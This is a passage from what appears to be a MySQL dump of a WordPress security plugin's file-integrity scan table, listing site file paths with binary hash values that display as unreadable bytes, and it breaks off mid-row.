��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j\\�:$�Q�mǂ�I','\r��G�\\ϔuv�\\x��\'��!g��}�>','',0,'?'),('�I�\nBNSi�:#�','wp-content/uploads/2018/05/builder-updraft-pre-smush-original.jpg',0,'�|Ӑ��$��rtItF','�|Ӑ��$��rtItF','47+�9wU|\Z7�\'�mA�b�L֎˜���f','',0,'?'),('Ͻ�s���q��\'�z�','wp-content/uploads/2016/11/roofs.jpg',0,'�L���ʔ�~&5!���','�L���ʔ�~&5!���','�.�hk��g�ʞ�n=[��Ò��נ�L�','',0,'?'),('���r�F&aJ���2','wp-content/uploads/2016/11/kitchen-768x512.jpg',0,'�ƛȷ�O�pVs6�>','�ƛȷ�O�pVs6�>','�h�\0���?[�F@\r��&M;�N�RI��ї�','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϳ,���u�[��@}�','�tr�L.�S�[+�\Z\"�dΌg|����h�xާ','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' U�Ӵ�xF�f��?','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ServiceCircularReferenceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�ݔ�c!9�����B�4','����!�\0Z�~���~��O2\"!\"\r��Ń��','',0,'?'),(' ��ɉ:�s�{1<�','wp-includes/blocks/embed/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ġ�-�y7!�ʾ�U','���2�U\'���I_c1��B�z�}��','',0,'?'),(' ��M��Y@w���','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-150x150.jpg',0,'�ki8U��4��\Zb�','�ki8U��4��\Zb�','�3׀8�,�y�dB��ip�N>.�M�p��','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' (0W�9��ސTl=','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-wikipedia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5H uQO��:�p��+S','x\\�{E,�6��h��_2��-n38�ږ','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2# �3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}jORI�plD�','�F�m��ճ(b���x���.W�N2���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' E^g�\'�ԭfQD�','wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-notification-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�@�C��\"��.���','?��?5�j���0~F��0�K%�����9C�','',0,'?'),(' E���hܺ�/UB��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Middleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Є�%5�퉅E�M��I0','١���|ǰ�_�HkfR Fc���>Meߔ/�','',0,'?'),(' R�I���|Y`R�Z','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Э��1C���#�$��D','���.����bT�o:�JQ�B����&���','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' Y�0�<�6tk���','wp-content/uploads/2016/11/interior-design-updraft-pre-smush-original.jpg',0,'���F>�t�����F','���F>�t�����F','o���%E��_^L����+�pmg�;J�','',0,'?'),(' �\\$i�0!mq_+���','wp-content/uploads/2016/11/White-Modern-Kitchen-350x220.jpg',0,'m$�\0e4l�]䦐�~Z','m$�\0e4l�]䦐�~Z','�t��i-ܾG!(�<����Ƅo�F�7a�\'�&�','',0,'?'),(' �y��>4�l��gR�','wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�Z� 8�Z�','��y� �q��k���j���|���gY{���','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2�H�]*��','���(a�f��\n��H��ƄF�e�M�O��','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�( ia�Y���(','����%��\Z0b��[u�#�v.�_�� O�=0','',0,'?'),(' ��$1p<���6�','wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ȷ��B_)�#���ة','P_G���T��.���+��e,)�AG�lv�\n','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �7=��4���#�N�','wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Eq����^�','F v\'���L,n�e�n>a�Nу�t\\�(!v��','',0,'?'),(' �\r$ Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)Y{�Q���[��','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��n�����^��_#','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-tracking-intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%;+�Y\'���c͔��','�����ٵ1�w�C*)P�c=�\n5\Z���\\','',0,'?'),(' ߦA�a��C��=�K','wp-content/plugins/wordpress-seo/css/dist/alerts-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^J��xIxݽ-\r�g','B��%�c!�GB_�z�C�:\Z_�]V\Z\'�','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' ������t4${�SE','wp-includes/blocks/categories/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#7ֽr\rг����','#1��1*D�?��J<=��|(\'.ċb]E���3��','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!)3�upX��>My���','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-term-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2-#�S�3��&C�','�h����՛�Vc�1��䆙~j����4','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���C�\0��Ol$�','sT�lEe��Bh�v:�g%�k��07k=��&!','',0,'?'),('!2x�d�e-�����','wp-content/uploads/2019/08/renting2.jpg',0,'�_҅\n����%Y�`�','�_҅\n����%Y�`�','r�P��h�(�G�J�@�Nb�i�@�ұ��I#','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!L\0�M�(W�R�E�%','wp-content/uploads/2019/10/plumbing-150x150.jpg',0,'ٲ�((�@`�d��','ٲ�((�@`�d��','ZS�Sތ}�llt9��U���y�۾�T�H�','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!c�ַ�@K���Vc�Q','wp-content/plugins/wordpress-seo/languages/yoast-components-da_DK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�`�M,m�jCL�>�','��)���[��C�]w/LD����?.��,s','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő� 2&�H','',0,'?'),('!|��8���I,�� ��','wp-content/plugins/wordpress-seo/admin/class-collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�xw�^Z','X+�\'=� ��`owH�r��2UY!���;�)�GM�','',0,'?'),('!��G�rx@\Z�~s','wp-content/plugins/wordpress-seo/admin/views/licenses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z����)�G','.R-}eģٳI=����4X�Pl��x�i{�Yz','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�G�Q�^83','�X�m!L��o�|_2*�A5B�ƞ\0Y��','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�<��9Wht_[','��=�0R�vk�Lbf��>(9�4�+Nm�M���','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!��>�NN����ٌ�','wp-includes/blocks/file/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�)btu���u��k','f�):1�9I<��\r��U\n�_�!kv|QC��^','',0,'?'),('!����8~W��>B�','wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��9z�%��0�[Ӽ','���6�\Z*G-��+�c�)��|��&[`^3','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����-�ߠ2g�l�','Ӏ���OD��I{`�b��ı�=ʬs�m��q.','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�k)�L����B�','��v�PXsP;rQ3�����|�#�&@��#','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m$̃�Mz�k���','��zf��_{I���다�H�b�L#ʝ$�O�Ѭ�','',0,'?'),('!ܧB�/�;�� ��','wp-content/languages/en_GB-6025add6bde16aaeb12787d250f9b414.json',0,'�jc�,���0_QF*�','�jc�,���0_QF*�','���f@��@ͣ��fN� */�t���ൎV�J','',0,'?'),('!߬�vg1�IV|�E�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<��ԉ1��-�3��','�wB��;\\q\\�8�N�!��-�X����!��\n','',0,'?'),('!�LjztO��֔~TcI>','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-ids.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s{��&��W�Á(�','Z�\Z�=��e5*��S��z=g)�J5փ�)���','',0,'?'),('!�Tۦ���� l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɳ��xm46c)��','en�*���~�a�يc]��Zbi�XCq��','',0,'?'),('!�-�\r.��d7O�','wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\W��ȹz�X#�}U','�7Zh�\Z]7`�N�`�ň\ZT�(ێ�J�ac�0J','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+*_A|UY�˻','��&���,p\0H�AUƫ��LI��t���[�','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�Do����Flz�','^��E����XD�o���v�orW��x�Y��\Z','',0,'?'),('\"\n���4j�SË�','wp-includes/blocks/spacer/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E ��-N�o����','�L�I�Y�ow�)�4!:�;?��','',0,'?'),('\"\r↻�7l~��˝A�','wp-includes/blocks/text-columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$6Eɫ8�y','�\\{�1�E��H=F�\'ֱ��L�=t�0�X�','',0,'?'),('\"(}G��r� 0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"-�Ѳ\n2�j%�(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�&�\"��{����#*�','���v���@.|���s>0�O���A3jA���','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�0���Ã�p|̉(','\\�;��2؞��ۙTS����\no\'�\Z�!���*q�','',0,'?'),('\"Y��:n���A���N','wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<}�� �Ȏ��� ','���}LGR�:�}Vʶ��G[�|�+�i�ht��','',0,'?'),('\"huy=��,����v�','wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�YPq��cr6�','�-\n$��P�o�i{b�bii;�1�۹[����','',0,'?'),('\"n�˅�1��UB1S','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/StreamInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�ϼ@}7>7���n�','���:��m�-y��*~���h�BB=��','',0,'?'),('\"q���� K6A���!','wp-includes/css/dist/reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�J_Z�w�;���','�R�=�WA)ш���`S{.�)�u�MM�F{�','',0,'?'),('\"u���-ȷ���|�h','wp-content/languages/plugins/wp-cerber-en_GB.po',0,' ��L��������',' ��L��������','�Q�[����V�������cè�5�{U9���','',0,'?'),('\"v5�_�=��`�|�}�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-woocommerce-shop-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5�j$E�MzbG��','V\\���\n]�֓���U�)R�M%d�$J� &Q','',0,'?'),('\"�\r�o�]\r:T0ۓ�%','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����k/Fc��t�','���J��%���g�����\0L;�7��R�','',0,'?'),('\"�s���EEK_���t','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-endpoint.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�Y�mܳ��&�P�+�','R��\Z3=�p�AK��L��ϭ��OrO�.l>','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eB�Ē���i�𣨷','��8y�Nnm��\\ڌ�4�b/��d��*}H','',0,'?'),('\"�\\�;T��4���X�','wp-content/themes/twentytwenty/inc/svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�_�Ȧ<I�����','���^U���˴�wPg�]��\Z4�2�\'N','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"����ۯ��6��7?','wp-includes/blocks/site-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rgm/��S��&;w',']BkU�J�(�υ�|9���| C��p����,','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�Z�_Z\0\0���y�','wp-content/plugins/wp-cerber/assets/flags/mu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�1�����($+a�','m� )���5p�PP�:�|X������u��\0j�','',0,'?'),('\"�;�M> �����L','wp-content/themes/vega/assets/js/jquery.matchHeight-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n����*Z�','e�ܡ >�\0w\\Gs�_X�����T���0��','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j,�f�d����','��c�g,���� T���3�N���Y','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l?7�\\�z�1e���&','\r����J�/��t�J�h�bT�2�j��%kM�','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"���^+����3�-','wp-content/plugins/redirection/matches/server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oz��|�os�%�f�','C��?�O�ϋ�\"�l��CD�02��:�;�~�','',0,'?'),('\"�D�Z~\0�|�3���','wp-includes/blocks/query/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g���A[N�\"/�','�@z@Ҵ:ot�`�+�?�u}�3U*3�M`>q}D','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����y�T�#���','PX�ü����P�qTg��N�,�K���','',0,'?'),('#�z1h�����;','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx߰+e�=�SF�','��5,����nR��j�t�ݑ���ʦ/���','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#49��%��8n{Ӂ�t','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\'c�7� 6��y��2','����\r>V��f�;Æ\Z������(��/4�','',0,'?'),('#4��iGv�u+B��.','wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qy��g�0�%�v�}','��}c&�/cL��9�:�h�t�Eu[9�OC�','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�jQb��c�uV','4���zڜ\n�A⧑ˆB��/1�쀗��a{)','',0,'?'),('#Gp\\���=�e�_','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/de.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"+��m<�aت',' �96��O�]c4��m8궕}RQ�_h���','',0,'?'),('#R^#u�5~BQ��','wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uji�Re}6�z�kz�','�C�r� �m�/[]\'D�S<�@��R�B��k�','',0,'?'),('#W�\n��Y�,!Z��*�','wp-content/plugins/wp-cerber/assets/flags/sn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��-#��9���uQ','i}2��3��&�ܓ��w0��r��wJ,�','',0,'?'),('#^ ̉�Θ!�M�z?{{','wp-content/plugins/wp-cerber/assets/flags/gs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~�\Z7c�o#.','o=b�i�e�U�\Z�N�1>��Vy��..��3Z`�','',0,'?'),('#t�n2����=�^V','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�8W��:|%\"�rW��',':�#K�;�9�dlK OK������=�8�','',0,'?'),('#t0o��ևZ�3��ȿ','wp-content/uploads/2021/08/building-768815_1920-300x250.jpg',0,'����7\'vD�s\r�D�','����7\'vD�s\r�D�','z����6����`��Q����!�?�J������','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r���|�P4&.|��','�%Mu���#��g��]�zmܦ���8���u�','',0,'?'),('#|F̉�%�������\Z','wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H}����O�/�',']��uZQ���Oc]�n�.fN�w�07C�_D�','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ѯ�N���ϕ�','��w��-�2�XR�(��&W��&H���b���','',0,'?'),('#�\\M��@�0���T�','wp-includes/blocks/post-excerpt/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('#�QCw��3e���X�9�','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��\0����7���','@U���JL�$)\ZO\\|��bS|o�R���','',0,'?'),('#�}s���a��a��,!','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�50�~�����','�;{֗88}���\r�|�ѫ�^���@Fj','',0,'?'),('#�-g�\\L%3�SB#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0 ��6�ӭ�Iv����hJ��`����','',0,'?'),('#�ۘ�ƿ��.u�L� ','wp-content/plugins/redirection/locale/json/redirection-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�/����C�y��/�*','\Z�6�j\0��Q���b������hi��YW��(','',0,'?'),('#�)_�۱�Y����h}2','wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�ȟ�w �k8�','����o-�\r�z�/�}�� ��q�s��u��R�','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�����^C���%��k�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[D�g<.vܩH#k�SI','�v(��JG��D�W�_<3O63�m��\Z�','',0,'?'),('$\\��Q���L?�1&�{','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zݨ|$�}&��ǖ','�/5�l��d�eR�����H���Z��V�','',0,'?'),('$&��A�ÆJ���_!6�','wp-content/plugins/wp-cerber/assets/flags/my.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG��M� �;k��=�','_PL��0�\0�:��sP㱤��b�G6Ia�','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F����Y�`�8�','^�z�y�{b�.n�&o@�{�<,�$��}�','',0,'?'),('$8}��eD$�赑�','wp-content/plugins/redirection/fileio/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A{=]���_�p,0','p�Ϛ.o�v�%�L�8CB����M�\'�l�\Zg','',0,'?'),('$;Q�C�G\n�P\n','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�v̷\r���nM�','�ոF\'հ�g-ql)Q���/5��}�t0l\r�$','',0,'?'),('$D[�������\Z*.�\'','wp-content/plugins/wordpress-seo/js/dist/dashboard-widget-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�I3Z�7�̜��','o�\rT*�۾hX!�L�[�4���^�ns\r���1','',0,'?'),('$N�P��9������','wp-c